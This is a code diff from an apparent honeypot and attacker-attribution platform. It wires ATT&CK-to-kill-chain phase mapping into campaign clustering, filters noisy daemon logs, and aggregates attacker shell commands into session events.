||||||
|
per-(identity, primitive) observation series, upserts the
|
||||||
|
derived state, and publishes
|
||||||
|
``attribution.profile.state_changed`` only on transition.
|
||||||
|
Periodic tick fires
|
||||||
|
``attribution.profile.multi_actor_suspected`` when >= 2
|
||||||
|
primitives flag the same identity.
|
||||||
|
|
||||||
|
Closes DEBT-051. Bright-line scope: behavioural coherence and
|
||||||
|
drift only — never persona attribution to natural persons.
|
||||||
|
"""
|
||||||
|
import asyncio
|
||||||
|
from decnet.correlation.attribution_worker import (
|
||||||
|
run_attribution_loop,
|
||||||
|
)
|
||||||
|
from decnet.web.dependencies import repo
|
||||||
|
|
||||||
|
if daemon:
|
||||||
|
log.info(
|
||||||
|
"attribution worker daemonizing tick=%s",
|
||||||
|
multi_actor_tick_secs,
|
||||||
|
)
|
||||||
|
_utils._daemonize()
|
||||||
|
|
||||||
|
log.info(
|
||||||
|
"attribution worker command invoked tick=%s",
|
||||||
|
multi_actor_tick_secs,
|
||||||
|
)
|
||||||
|
console.print(
|
||||||
|
f"[bold cyan]Attribution engine starting[/] "
|
||||||
|
f"multi_actor_tick={multi_actor_tick_secs}s"
|
||||||
|
)
|
||||||
|
console.print("[dim]Press Ctrl+C to stop[/]")
|
||||||
|
|
||||||
|
async def _run() -> None:
|
||||||
|
await repo.initialize()
|
||||||
|
await run_attribution_loop(
|
||||||
|
repo,
|
||||||
|
multi_actor_tick_secs=multi_actor_tick_secs,
|
||||||
|
)
|
||||||
|
|
||||||
|
try:
|
||||||
|
asyncio.run(_run())
|
||||||
|
except KeyboardInterrupt:
|
||||||
|
console.print("\n[yellow]Attribution engine stopped.[/]")
|
||||||
|
|
||||||
@app.command(name="clusterer")
|
@app.command(name="clusterer")
|
||||||
def clusterer(
|
def clusterer(
|
||||||
poll_interval_secs: float = typer.Option(
|
poll_interval_secs: float = typer.Option(
|
||||||
@@ -295,3 +359,10 @@ def register(app: typer.Typer) -> None:
|
|||||||
asyncio.run(_run())
|
asyncio.run(_run())
|
||||||
except KeyboardInterrupt:
|
except KeyboardInterrupt:
|
||||||
console.print("\n[yellow]Campaign clusterer stopped.[/]")
|
console.print("\n[yellow]Campaign clusterer stopped.[/]")
|
||||||
|
|
||||||
|
# ``decnet ttp`` and ``decnet ttp-backfill`` moved to
|
||||||
|
# :mod:`decnet.cli.ttp` — the TTP CLI surface (worker + admin verbs)
|
||||||
|
# is colocated there, mirroring the per-feature CLI split used by
|
||||||
|
# :mod:`decnet.cli.canary`, :mod:`decnet.cli.webhook`, etc. The
|
||||||
|
# ``decnet-ttp.service`` systemd unit's ExecStart still resolves to
|
||||||
|
# ``decnet ttp`` because the command name is unchanged.
|
||||||
|
|||||||
@@ -66,7 +66,10 @@ def cluster_identities(
|
|||||||
return {f.identity_uuid: f"cmp-{find(f.identity_uuid)}" for f in feat_list}
|
return {f.identity_uuid: f"cmp-{find(f.identity_uuid)}" for f in feat_list}
|
||||||
|
|
||||||
|
|
||||||
def from_identity_row(row: dict[str, Any]) -> IdentityFeatures:
|
def from_identity_row(
|
||||||
|
row: dict[str, Any],
|
||||||
|
ttp_decky_phases: list[dict[str, Any]] | None = None,
|
||||||
|
) -> IdentityFeatures:
|
||||||
"""Project an ``AttackerIdentity`` projection row dict into an
|
"""Project an ``AttackerIdentity`` projection row dict into an
|
||||||
:class:`IdentityFeatures`.
|
:class:`IdentityFeatures`.
|
||||||
|
|
||||||
@@ -75,20 +78,59 @@ def from_identity_row(row: dict[str, Any]) -> IdentityFeatures:
|
|||||||
ja3_hashes / hassh_hashes / payload_simhashes / c2_endpoints
|
ja3_hashes / hassh_hashes / payload_simhashes / c2_endpoints
|
||||||
(JSON list[str] or null).
|
(JSON list[str] or null).
|
||||||
|
|
||||||
Phase-handoff fields stay empty until the production-row adapter
|
*ttp_decky_phases* is the optional per-identity payload from
|
||||||
learns to mine logs for per-decky phase sequences (TODO.md
|
:meth:`BaseRepository.list_ttp_decky_phases` — one row per
|
||||||
"production-side payload + C2 + commands joins"). Without those,
|
``ttp_tag`` carrying ``(decky_id, tactic, created_at_ts)``. When
|
||||||
the campaign clusterer falls back to shared-infra + temporal
|
provided, the adapter projects ``tactic`` → :class:`UKCPhase` and
|
||||||
overlap + cohort signals on production data; the fixture path
|
populates :attr:`IdentityFeatures.first_phase_per_decky` /
|
||||||
exercises the full feature set via :func:`from_synthetic_identity`.
|
``last_phase_per_decky`` / ``first_seen_per_decky`` /
|
||||||
|
``last_seen_per_decky`` so the production phase-handoff edge
|
||||||
|
finally fires. The synthetic fixture path
|
||||||
|
(:func:`from_synthetic_identity`) is unchanged — fixtures keep
|
||||||
|
emitting UKC directly.
|
||||||
"""
|
"""
|
||||||
|
from decnet.clustering.ukc import tactic_to_ukc_phase # noqa: PLC0415
|
||||||
|
|
||||||
payload_hashes = _parse_json_list(row.get("payload_simhashes"))
|
payload_hashes = _parse_json_list(row.get("payload_simhashes"))
|
||||||
c2_endpoints = _parse_json_list(row.get("c2_endpoints"))
|
c2_endpoints = _parse_json_list(row.get("c2_endpoints"))
|
||||||
|
|
||||||
|
first_phase_per_decky: dict[str, str] = {}
|
||||||
|
last_phase_per_decky: dict[str, str] = {}
|
||||||
|
first_seen_per_decky: dict[str, float] = {}
|
||||||
|
last_seen_per_decky: dict[str, float] = {}
|
||||||
|
decky_set: set[str] = set()
|
||||||
|
|
||||||
|
# Rows arrive ordered by ``created_at``; ``setdefault`` preserves
|
||||||
|
# the FIRST observation per decky, plain assignment captures the
|
||||||
|
# LAST. Tags whose tactic is outside the ATT&CK→UKC map (or whose
|
||||||
|
# phase is pre-target / unobservable) are dropped — they should
|
||||||
|
# not be assigned by any rule per TTP_TAGGING.md §UKC bridge.
|
||||||
|
for entry in ttp_decky_phases or []:
|
||||||
|
decky = entry.get("decky_id")
|
||||||
|
tactic = entry.get("tactic")
|
||||||
|
created_at_ts = entry.get("created_at_ts")
|
||||||
|
if not isinstance(decky, str) or not isinstance(tactic, str):
|
||||||
|
continue
|
||||||
|
phase = tactic_to_ukc_phase(tactic)
|
||||||
|
if phase is None:
|
||||||
|
continue
|
||||||
|
ts = float(created_at_ts) if isinstance(
|
||||||
|
created_at_ts, (int, float)) else 0.0
|
||||||
|
decky_set.add(decky)
|
||||||
|
first_phase_per_decky.setdefault(decky, phase.value)
|
||||||
|
last_phase_per_decky[decky] = phase.value
|
||||||
|
first_seen_per_decky.setdefault(decky, ts)
|
||||||
|
last_seen_per_decky[decky] = ts
|
||||||
|
|
||||||
return IdentityFeatures(
|
return IdentityFeatures(
|
||||||
identity_uuid=row["uuid"],
|
identity_uuid=row["uuid"],
|
||||||
payload_hashes=frozenset(payload_hashes),
|
payload_hashes=frozenset(payload_hashes),
|
||||||
c2_endpoints=frozenset(c2_endpoints),
|
c2_endpoints=frozenset(c2_endpoints),
|
||||||
|
decky_set=frozenset(decky_set),
|
||||||
|
first_phase_per_decky=first_phase_per_decky,
|
||||||
|
last_phase_per_decky=last_phase_per_decky,
|
||||||
|
first_seen_per_decky=first_seen_per_decky,
|
||||||
|
last_seen_per_decky=last_seen_per_decky,
|
||||||
)
|
)
|
||||||
|
|
||||||
|
|
||||||
@@ -132,8 +174,26 @@ class ConnectedComponentsCampaignClusterer(CampaignClusterer):
|
|||||||
# merged out — their winner is the active row and gets clustered
|
# merged out — their winner is the active row and gets clustered
|
||||||
# on its own. This keeps the campaign graph from double-counting.
|
# on its own. This keeps the campaign graph from double-counting.
|
||||||
active_rows = [r for r in rows if not r.get("merged_into_uuid")]
|
active_rows = [r for r in rows if not r.get("merged_into_uuid")]
|
||||||
|
# Pull TTP-derived per-decky phase observations per identity
|
||||||
|
# (E.3.15). Failures here are non-fatal — the clusterer falls
|
||||||
|
# back to the empty phase-handoff signal, same as the legacy
|
||||||
|
# behavior, so a partial repo doesn't take the worker down.
|
||||||
|
decky_phases_by_identity: dict[str, list[dict[str, Any]]] = {}
|
||||||
|
for r in active_rows:
|
||||||
|
try:
|
||||||
|
decky_phases_by_identity[r["uuid"]] = (
|
||||||
|
await repo.list_ttp_decky_phases(r["uuid"])
|
||||||
|
)
|
||||||
|
except Exception: # noqa: BLE001
|
||||||
|
log.warning(
|
||||||
|
"campaign clusterer: list_ttp_decky_phases failed "
|
||||||
|
"for identity %s; phase-handoff edge inert",
|
||||||
|
r["uuid"],
|
||||||
|
)
|
||||||
|
decky_phases_by_identity[r["uuid"]] = []
|
||||||
feature_list: list[IdentityFeatures] = [
|
feature_list: list[IdentityFeatures] = [
|
||||||
from_identity_row(r) for r in active_rows
|
from_identity_row(r, decky_phases_by_identity.get(r["uuid"]))
|
||||||
|
for r in active_rows
|
||||||
]
|
]
|
||||||
row_by_uuid: dict[str, dict[str, Any]] = {
|
row_by_uuid: dict[str, dict[str, Any]] = {
|
||||||
r["uuid"]: r for r in active_rows
|
r["uuid"]: r for r in active_rows
|
||||||
|
|||||||
@@ -342,7 +342,7 @@ def combined_campaign_weight(
|
|||||||
# ─── Adapter for synthetic-fixture tests ────────────────────────────────────
|
# ─── Adapter for synthetic-fixture tests ────────────────────────────────────
|
||||||
|
|
||||||
|
|
||||||
def from_synthetic_identity(att, identity_uuid: Optional[str] = None) -> IdentityFeatures: # type: ignore[no-untyped-def]
|
def from_synthetic_identity(att, identity_uuid: Optional[str] = None) -> IdentityFeatures:
|
||||||
"""Build an :class:`IdentityFeatures` from a ``SyntheticAttacker``.
|
"""Build an :class:`IdentityFeatures` from a ``SyntheticAttacker``.
|
||||||
|
|
||||||
Treats one ``SyntheticAttacker`` as one identity — adequate for
|
Treats one ``SyntheticAttacker`` as one identity — adequate for
|
||||||
|
|||||||
@@ -105,11 +105,11 @@ async def run_campaign_clusterer_loop(
|
|||||||
t.cancel()
|
t.cancel()
|
||||||
if heartbeat_task is not None:
|
if heartbeat_task is not None:
|
||||||
heartbeat_task.cancel()
|
heartbeat_task.cancel()
|
||||||
for t in (*wake_tasks, heartbeat_task):
|
for task in (*wake_tasks, heartbeat_task):
|
||||||
if t is None:
|
if task is None:
|
||||||
continue
|
continue
|
||||||
with contextlib.suppress(asyncio.CancelledError, Exception):
|
with contextlib.suppress(asyncio.CancelledError, Exception):
|
||||||
await t
|
await task
|
||||||
if bus is not None:
|
if bus is not None:
|
||||||
with contextlib.suppress(Exception):
|
with contextlib.suppress(Exception):
|
||||||
await bus.close()
|
await bus.close()
|
||||||
|
|||||||
@@ -363,8 +363,9 @@ async def _roll_up_fingerprints(
|
|||||||
breaks the clusterer tick — the columns just stay stale until the
|
breaks the clusterer tick — the columns just stay stale until the
|
||||||
next pass."""
|
next pass."""
|
||||||
summaries = extract_fp_summaries(member_rows)
|
summaries = extract_fp_summaries(member_rows)
|
||||||
|
fp_kwargs = {k: v for k, v in summaries.items() if k in {"ja3_hashes", "hassh_hashes", "tls_cert_sha256"}}
|
||||||
try:
|
try:
|
||||||
await repo.update_identity_fingerprints(identity_uuid, **summaries)
|
await repo.update_identity_fingerprints(identity_uuid, **fp_kwargs)
|
||||||
except Exception: # noqa: BLE001
|
except Exception: # noqa: BLE001
|
||||||
log.exception(
|
log.exception(
|
||||||
"clusterer: failed to roll up fingerprints for identity=%s",
|
"clusterer: failed to roll up fingerprints for identity=%s",
|
||||||
|
|||||||
@@ -265,7 +265,7 @@ def combined_edge_weight(a: Observation, b: Observation) -> float:
|
|||||||
# ─── Adapter for the synthetic-corpus tests ─────────────────────────────────
|
# ─── Adapter for the synthetic-corpus tests ─────────────────────────────────
|
||||||
|
|
||||||
|
|
||||||
def from_synthetic(att) -> Observation: # type: ignore[no-untyped-def]
|
def from_synthetic(att) -> Observation:
|
||||||
"""Build an :class:`Observation` from a ``SyntheticAttacker``.
|
"""Build an :class:`Observation` from a ``SyntheticAttacker``.
|
||||||
|
|
||||||
Lives here so test code doesn't import the factory shape into the
|
Lives here so test code doesn't import the factory shape into the
|
||||||
|
|||||||
@@ -15,6 +15,7 @@ emits no events for unobservable phases.
|
|||||||
from __future__ import annotations
|
from __future__ import annotations
|
||||||
|
|
||||||
from enum import Enum
|
from enum import Enum
|
||||||
|
from typing import Final
|
||||||
|
|
||||||
|
|
||||||
class UKCPhase(str, Enum):
|
class UKCPhase(str, Enum):
|
||||||
@@ -106,3 +107,96 @@ def stage_of(phase: UKCPhase) -> str:
|
|||||||
if phase in STAGE_THROUGH:
|
if phase in STAGE_THROUGH:
|
||||||
return "through"
|
return "through"
|
||||||
return "out"
|
return "out"
|
||||||
|
|
||||||
|
|
||||||
|
# MITRE ATT&CK tactic ID -> UKC phase. Covers the 14 enterprise tactics
|
||||||
|
# plus the four ICS tactics referenced by Appendix A.7 (Conpot, MQTT).
|
||||||
|
# Adding additional ICS tactics is a one-line addition. See
|
||||||
|
# TTP_TAGGING.md "UKC bridge".
|
||||||
|
ATTACK_TACTIC_TO_UKC: dict[str, UKCPhase] = {
|
||||||
|
# Enterprise
|
||||||
|
"TA0043": UKCPhase.RECONNAISSANCE, # Reconnaissance
|
||||||
|
"TA0042": UKCPhase.RESOURCE_DEVELOPMENT, # Resource Development
|
||||||
|
"TA0001": UKCPhase.DELIVERY, # Initial Access
|
||||||
|
"TA0002": UKCPhase.EXECUTION, # Execution
|
||||||
|
"TA0003": UKCPhase.PERSISTENCE, # Persistence
|
||||||
|
"TA0004": UKCPhase.PRIVILEGE_ESCALATION, # Privilege Escalation
|
||||||
|
"TA0005": UKCPhase.DEFENSE_EVASION, # Defense Evasion
|
||||||
|
"TA0006": UKCPhase.CREDENTIAL_ACCESS, # Credential Access
|
||||||
|
"TA0007": UKCPhase.DISCOVERY, # Discovery
|
||||||
|
"TA0008": UKCPhase.LATERAL_MOVEMENT, # Lateral Movement
|
||||||
|
"TA0009": UKCPhase.COLLECTION, # Collection
|
||||||
|
"TA0011": UKCPhase.COMMAND_AND_CONTROL, # Command and Control
|
||||||
|
"TA0010": UKCPhase.EXFILTRATION, # Exfiltration
|
||||||
|
"TA0040": UKCPhase.IMPACT, # Impact
|
||||||
|
# ICS — first-class projection so MQTT / Conpot / Modbus tags
|
||||||
|
# don't drop out of campaign rollups when the clusterer projects
|
||||||
|
# tactic to phase. ICS uses an independent tactic-ID range.
|
||||||
|
"TA0100": UKCPhase.COLLECTION, # ICS: Collection
|
||||||
|
"TA0102": UKCPhase.DISCOVERY, # ICS: Discovery
|
||||||
|
"TA0105": UKCPhase.IMPACT, # ICS: Impact
|
||||||
|
"TA0106": UKCPhase.IMPACT, # ICS: Impair Process Control
|
||||||
|
}
|
||||||
|
|
||||||
|
|
||||||
|
# ICS tactics live in a separate STIX bundle (mitre/ics-attack) that
|
||||||
|
# DECNET does not currently load. They're exempt from the
|
||||||
|
# enterprise-bundle validation in :func:`validate_against_attack_bundle`
|
||||||
|
# so a startup check doesn't false-fail the moment ICS rules are wired.
|
||||||
|
_NON_ENTERPRISE_TACTICS: Final[frozenset[str]] = frozenset(
|
||||||
|
{"TA0100", "TA0102", "TA0105", "TA0106"}
|
||||||
|
)
|
||||||
|
|
||||||
|
|
||||||
|
def validate_against_attack_bundle() -> None:
|
||||||
|
"""Assert every enterprise tactic ID in :data:`ATTACK_TACTIC_TO_UKC` resolves in the loaded STIX bundle.
|
||||||
|
|
||||||
|
Called at startup (see :mod:`decnet.ttp.impl.rule_engine`) so a
|
||||||
|
typoed tactic ID surfaces as a fail-closed boot, not a silent
|
||||||
|
miss in campaign rollups.
|
||||||
|
"""
|
||||||
|
from decnet.ttp.attack_stix import assert_known_tactic_ids
|
||||||
|
|
||||||
|
assert_known_tactic_ids(
|
||||||
|
list(ATTACK_TACTIC_TO_UKC.keys()),
|
||||||
|
source="decnet.clustering.ukc.ATTACK_TACTIC_TO_UKC",
|
||||||
|
exempt=set(_NON_ENTERPRISE_TACTICS),
|
||||||
|
)
|
||||||
|
|
||||||
|
|
||||||
|
def tactic_to_ukc_phase(tactic: str) -> UKCPhase | None:
|
||||||
|
"""Map an ATT&CK tactic ID (e.g. ``"TA0001"``) to a :class:`UKCPhase`.
|
||||||
|
|
||||||
|
Returns ``None`` for unknown tactics. The map is closed over the
|
||||||
|
enterprise + ICS tactics referenced by the rule pack; a tactic
|
||||||
|
outside that set is a contributor bug, not a runtime miss.
|
||||||
|
"""
|
||||||
|
return ATTACK_TACTIC_TO_UKC.get(tactic)
|
||||||
|
|
||||||
|
|
||||||
|
# Inverse map, built once at import time. Several tactics collide on
|
||||||
|
# the same phase (e.g. both TA0009 and TA0100 map to COLLECTION); the
|
||||||
|
# enterprise tactic wins because it's listed first in
|
||||||
|
# ATTACK_TACTIC_TO_UKC. A dict comprehension keeps the LAST write per
|
||||||
|
# key, so we iterate in reverse to keep the FIRST
|
||||||
|
# occurrence per phase. Pre-target phases (RECONNAISSANCE,
|
||||||
|
# RESOURCE_DEVELOPMENT, WEAPONIZATION, SOCIAL_ENGINEERING) that are
|
||||||
|
# not in OBSERVABLE_PHASES are deliberately lossy on the inverse —
|
||||||
|
# TTP tags must never assign them, so projecting back to a tactic
|
||||||
|
# is undefined. See TTP_TAGGING.md §UKC bridge.
|
||||||
|
_UKC_TO_TACTIC: dict[UKCPhase, str] = {
|
||||||
|
phase: tactic
|
||||||
|
for tactic, phase in reversed(list(ATTACK_TACTIC_TO_UKC.items()))
|
||||||
|
}
|
||||||
|
|
||||||
|
|
||||||
|
def ukc_phase_to_tactic(phase: UKCPhase) -> str | None:
|
||||||
|
"""Map a :class:`UKCPhase` back to an ATT&CK tactic ID.
|
||||||
|
|
||||||
|
Lossy on phases outside :data:`OBSERVABLE_PHASES` — pre-target
|
||||||
|
phases (e.g. ``RECONNAISSANCE``, ``WEAPONIZATION``) return
|
||||||
|
``None`` because no rule emits them, so the inverse is
|
||||||
|
undefined by design. The CDD test in E.2.9 pins which phases
|
||||||
|
are lossy.
|
||||||
|
"""
|
||||||
|
return _UKC_TO_TACTIC.get(phase)
|
||||||
|
|||||||
@@ -115,11 +115,11 @@ async def run_clusterer_loop(
|
|||||||
t.cancel()
|
t.cancel()
|
||||||
if heartbeat_task is not None:
|
if heartbeat_task is not None:
|
||||||
heartbeat_task.cancel()
|
heartbeat_task.cancel()
|
||||||
for t in (*wake_tasks, heartbeat_task):
|
for task in (*wake_tasks, heartbeat_task):
|
||||||
if t is None:
|
if task is None:
|
||||||
continue
|
continue
|
||||||
with contextlib.suppress(asyncio.CancelledError, Exception):
|
with contextlib.suppress(asyncio.CancelledError, Exception):
|
||||||
await t
|
await task
|
||||||
if bus is not None:
|
if bus is not None:
|
||||||
with contextlib.suppress(Exception):
|
with contextlib.suppress(Exception):
|
||||||
await bus.close()
|
await bus.close()
|
||||||
|
|||||||
@@ -18,6 +18,7 @@ from datetime import datetime
|
|||||||
from pathlib import Path
|
from pathlib import Path
|
||||||
from typing import Any, Callable, Optional
|
from typing import Any, Callable, Optional
|
||||||
|
|
||||||
|
from decnet.artifacts.shards import find_shard_with_sid
|
||||||
from decnet.bus import topics as _topics
|
from decnet.bus import topics as _topics
|
||||||
from decnet.bus.factory import get_bus
|
from decnet.bus.factory import get_bus
|
||||||
from decnet.bus.publish import (
|
from decnet.bus.publish import (
|
||||||
@@ -75,6 +76,21 @@ _RL_EVENT_TYPES: frozenset[str] = frozenset(
|
|||||||
)
|
)
|
||||||
_RL_MAX_ENTRIES: int = 10_000
|
_RL_MAX_ENTRIES: int = 10_000
|
||||||
|
|
||||||
|
# APP-NAMEs we never want to see in the ingestion stream — native unix
|
||||||
|
# daemons that share a container with a DECNET service. Their logs are
|
||||||
|
# noise: sshd's "Failed password for root from X" duplicates the
|
||||||
|
# auth-helper's structured `auth_attempt` event, pam_unix repeats it
|
||||||
|
# again, and CRON/systemd/etc. say nothing about attacker behavior.
|
||||||
|
# Override or extend with DECNET_COLLECTOR_DROP_APPS (comma list).
|
||||||
|
_DROP_APPS: frozenset[str] = frozenset(
|
||||||
|
a.strip()
|
||||||
|
for a in os.environ.get(
|
||||||
|
"DECNET_COLLECTOR_DROP_APPS",
|
||||||
|
"sshd,pam_unix,sudo,su,CRON,cron,systemd,kernel,rsyslogd,dbus-daemon",
|
||||||
|
).split(",")
|
||||||
|
if a.strip()
|
||||||
|
)
|
||||||
|
|
||||||
_rl_lock: threading.Lock = threading.Lock()
|
_rl_lock: threading.Lock = threading.Lock()
|
||||||
_rl_last: dict[tuple[str, str, str, str], float] = {}
|
_rl_last: dict[tuple[str, str, str, str], float] = {}
|
||||||
|
|
||||||
@@ -82,10 +98,11 @@ _rl_last: dict[tuple[str, str, str, str], float] = {}
|
|||||||
def _should_ingest(parsed: dict[str, Any]) -> bool:
|
def _should_ingest(parsed: dict[str, Any]) -> bool:
|
||||||
"""
|
"""
|
||||||
Return True if this parsed event should be written to the JSON ingestion
|
Return True if this parsed event should be written to the JSON ingestion
|
||||||
stream. Rate-limited connection-lifecycle events return False when another
|
stream. Drops native unix daemon noise (sshd, pam_unix, …) outright;
|
||||||
event with the same (attacker_ip, decky, service, event_type) was emitted
|
rate-limits connection-lifecycle events within a dedup window.
|
||||||
inside the dedup window.
|
|
||||||
"""
|
"""
|
||||||
|
if parsed.get("service", "") in _DROP_APPS:
|
||||||
|
return False
|
||||||
event_type = parsed.get("event_type", "")
|
event_type = parsed.get("event_type", "")
|
||||||
if _RL_WINDOW_SEC <= 0.0 or event_type not in _RL_EVENT_TYPES:
|
if _RL_WINDOW_SEC <= 0.0 or event_type not in _RL_EVENT_TYPES:
|
||||||
return True
|
return True
|
||||||
@@ -116,6 +133,234 @@ def _reset_rate_limiter() -> None:
|
|||||||
with _rl_lock:
|
with _rl_lock:
|
||||||
_rl_last.clear()
|
_rl_last.clear()
|
||||||
|
|
||||||
|
|
||||||
|
# ─── Session aggregator (TTP `attacker.session.ended` producer) ──────────────
|
||||||
|
#
|
||||||
|
# The TTP worker subscribes to ``attacker.session.ended`` and turns each
|
||||||
|
# emitted command into a ``source_kind="command"`` :class:`TaggerEvent`
|
||||||
|
# (see ``decnet/ttp/worker._build_events``). No upstream worker was
|
||||||
|
# producing that topic — the rule pack therefore never fired on live
|
||||||
|
# traffic. The aggregator below indexes shell-command events
|
||||||
|
# per-attacker_ip and emits one ``attacker.session.ended`` envelope
|
||||||
|
# whenever the SSH ``sessrec`` worker publishes ``session_recorded``.
|
||||||
|
#
|
||||||
|
# Memory bound: each attacker_ip's command list is capped by a TTL eviction
|
||||||
|
# (default 3600 s). Override via ``DECNET_COLLECTOR_SESSION_AGG_TTL_SEC``.
|
||||||
|
|
||||||
|
_SESSION_AGG_TTL_SEC: float = _parse_float_env(
|
||||||
|
"DECNET_COLLECTOR_SESSION_AGG_TTL_SEC", 3600.0,
|
||||||
|
)
|
||||||
|
|
||||||
|
|
||||||
|
# Body of a bash PROMPT_COMMAND CMD line:
|
||||||
|
# ``CMD uid=0 user=root src=192.168.1.5 pwd=/root cmd=ls /var/www/html``
|
||||||
|
# Splits into the structured fields the inspector renders + the
|
||||||
|
# residual ``cmd=`` value (which may itself contain spaces — preserve
|
||||||
|
# everything after ``cmd=`` as one token, do NOT word-split).
|
||||||
|
_CMD_BODY_HEAD_KV_RE = re.compile(r'(\w+)=(\S+)')
|
||||||
|
|
||||||
|
|
||||||
|
def _parse_cmd_msg(msg: str) -> dict[str, str]:
|
||||||
|
"""Split a bash CMD msg body into ``{uid, user, src, pwd, command}``.
|
||||||
|
|
||||||
|
Returns the empty dict on a non-CMD msg. ``command`` carries the
|
||||||
|
full post-``cmd=`` rest, including any embedded whitespace —
|
||||||
|
tools like ``nmap -p- 192.168.1.0/24`` would otherwise lose
|
||||||
|
everything after the first space.
|
||||||
|
"""
|
||||||
|
if not msg.startswith("CMD "):
|
||||||
|
return {}
|
||||||
|
head, sep, cmd_rest = msg[4:].partition("cmd=")
|
||||||
|
out: dict[str, str] = {}
|
||||||
|
for k, v in _CMD_BODY_HEAD_KV_RE.findall(head):
|
||||||
|
out[k] = v
|
||||||
|
if sep:
|
||||||
|
out["command"] = cmd_rest
|
||||||
|
return out
|
||||||
|
|
||||||
|
|
||||||
|
def _parse_iso_ts(value: str) -> Optional[datetime]:
|
||||||
|
"""Best-effort ISO-8601 parse for parsed event timestamps.
|
||||||
|
|
||||||
|
The collector's parser stamps ``timestamp`` either as the original
|
||||||
|
ISO-8601 string (when ``datetime.fromisoformat`` failed) or as the
|
||||||
|
reformatted ``%Y-%m-%d %H:%M:%S`` string. Both round-trip through
|
||||||
|
``fromisoformat`` after a space→T swap. Returns None if neither
|
||||||
|
shape parses — the aggregator skips events it can't time-stamp.
|
||||||
|
"""
|
||||||
|
if not value:
|
||||||
|
return None
|
||||||
|
candidates = (value, value.replace(" ", "T"))
|
||||||
|
for cand in candidates:
|
||||||
|
try:
|
||||||
|
return datetime.fromisoformat(cand)
|
||||||
|
except ValueError:
|
||||||
|
continue
|
||||||
|
return None
|
||||||
|
|
||||||
|
|
||||||
|
class _SessionAggregator:
    """Per-attacker_ip command index that emits ``attacker.session.ended``.

    ``command`` events are buffered per attacker IP; a ``session_recorded``
    event triggers one ``attacker.session.ended`` publish carrying the
    buffered commands that fall inside the session's duration window.

    Thread-safe — :meth:`add_event` is called from the per-container
    stream threads. Internal state is protected by a single lock; the
    publish fan-out happens inside the lock for simplicity (the
    downstream publish_fn is the thread-safe marshaller from
    :mod:`decnet.bus.publish`, which is non-blocking).

    NOTE(review): the shard lookup in :meth:`_emit_session` also runs
    while the lock is held — confirm that ``find_shard_with_sid`` is
    cheap enough not to stall the other stream threads.
    """

    def __init__(
        self,
        publish_fn: Callable[[str, dict[str, Any], str], None],
        *,
        ttl_sec: float = _SESSION_AGG_TTL_SEC,
    ) -> None:
        """Create an empty aggregator.

        Args:
            publish_fn: Called as ``publish_fn(topic, payload, event_type)``
                for every emitted session envelope.
            ttl_sec: Age in seconds after which buffered commands are
                evicted.
        """
        self._publish = publish_fn
        self._ttl = ttl_sec
        self._lock = threading.Lock()
        # attacker_ip → list of (timestamp, parsed_event) tuples.
        # Stored as a list rather than a deque so the window filter can
        # scan linearly; the per-attacker volume is bounded by the TTL
        # and by typical session size (≤ a few hundred commands) so this
        # stays cheap.
        self._cmds: dict[str, list[tuple[datetime, dict[str, Any]]]] = {}

    def add_event(self, parsed: dict[str, Any]) -> None:
        """Index a parsed event. Emits on ``session_recorded``.

        Events without a usable ``attacker_ip`` (missing, empty or
        ``"Unknown"``) or without a parseable ``timestamp`` are ignored.
        Event types other than ``command`` and ``session_recorded`` only
        trigger TTL eviction.
        """
        event_type = parsed.get("event_type", "")
        attacker_ip = parsed.get("attacker_ip") or ""
        if not attacker_ip or attacker_ip == "Unknown":
            return
        ts = _parse_iso_ts(str(parsed.get("timestamp", "")))
        if ts is None:
            return
        with self._lock:
            # The event's own timestamp is the eviction clock.
            self._evict_expired(ts)
            if event_type == "command":
                self._cmds.setdefault(attacker_ip, []).append((ts, parsed))
                return
            if event_type == "session_recorded":
                self._emit_session(parsed, attacker_ip, ts)

    def _evict_expired(self, now: datetime) -> None:
        """Drop commands older than ``self._ttl`` seconds before *now*.

        Must be called with ``self._lock`` held. IPs whose list becomes
        empty are removed from the index entirely.
        """
        cutoff = now.timestamp() - self._ttl
        # Snapshot the items so entries can be deleted while iterating.
        for ip, entries in list(self._cmds.items()):
            kept = [(t, p) for t, p in entries if t.timestamp() >= cutoff]
            if kept:
                self._cmds[ip] = kept
            else:
                del self._cmds[ip]

    def _emit_session(
        self, parsed: dict[str, Any], attacker_ip: str, ended_at: datetime,
    ) -> None:
        """Build an ``attacker.session.ended`` envelope and publish it.

        Selects the buffered commands for *attacker_ip* whose timestamp is
        at or after ``ended_at - duration_s`` (only the lower bound is
        enforced). Commands stay buffered after the selection — TTL
        eviction is the only path that drops them, so two back-to-back
        sessions for the same IP share the visible window without losing
        rows.

        Must be called with ``self._lock`` held. Publish failures are
        logged at debug level and swallowed so a bus hiccup never breaks
        the stream thread.

        Args:
            parsed: The ``session_recorded`` event; ``fields`` is read for
                ``duration_s``, ``sid`` and ``service``.
            attacker_ip: Index key for the buffered commands.
            ended_at: Timestamp of the ``session_recorded`` event.
        """
        import math

        fields = parsed.get("fields", {}) or {}
        duration_raw = fields.get("duration_s") or "0"
        try:
            duration_s = float(duration_raw)
        except (TypeError, ValueError):
            duration_s = 0.0
        # float() accepts "nan" / "inf". A non-finite duration would make
        # the window comparison below admit every buffered command and
        # would put NaN/Infinity into the published payload, so treat it
        # like any other malformed value.
        if not math.isfinite(duration_s):
            duration_s = 0.0
        sid = str(fields.get("sid") or "")
        service = str(fields.get("service") or parsed.get("service") or "")
        decky = parsed.get("decky") or ""

        commands_window = self._cmds.get(attacker_ip, [])
        cutoff_lo = ended_at.timestamp() - max(duration_s, 0.0)
        commands: list[dict[str, Any]] = []
        # idx is the position in the full per-IP buffer, not in the
        # filtered result, so ids stay stable across overlapping sessions.
        for idx, (cmd_ts, cmd_parsed) in enumerate(commands_window):
            if cmd_ts.timestamp() < cutoff_lo:
                continue
            cmd_fields = cmd_parsed.get("fields", {}) or {}
            # Pull structured uid/user/src/pwd/command from the bash
            # msg body. The inspector renders these as separate
            # key/value rows, which is much friendlier than dumping
            # the raw ``CMD uid=0 user=... cmd=...`` string into a
            # single ``command_text`` blob.
            parsed_kv = _parse_cmd_msg(str(cmd_parsed.get("msg", "")))
            cmd_text = (
                cmd_fields.get("command")
                or cmd_fields.get("cmd")
                or parsed_kv.get("command")
                or cmd_parsed.get("msg", "")
            )
            entry: dict[str, Any] = {
                "id": f"{sid}#{idx}" if sid else f"{attacker_ip}-{cmd_ts.isoformat()}",
                "command_text": str(cmd_text),
                "ts": cmd_ts.isoformat(),
                "decky": cmd_parsed.get("decky", ""),
                "service": cmd_parsed.get("service", ""),
            }
            for key in ("uid", "user", "src", "pwd"):
                value = parsed_kv.get(key) or cmd_fields.get(key)
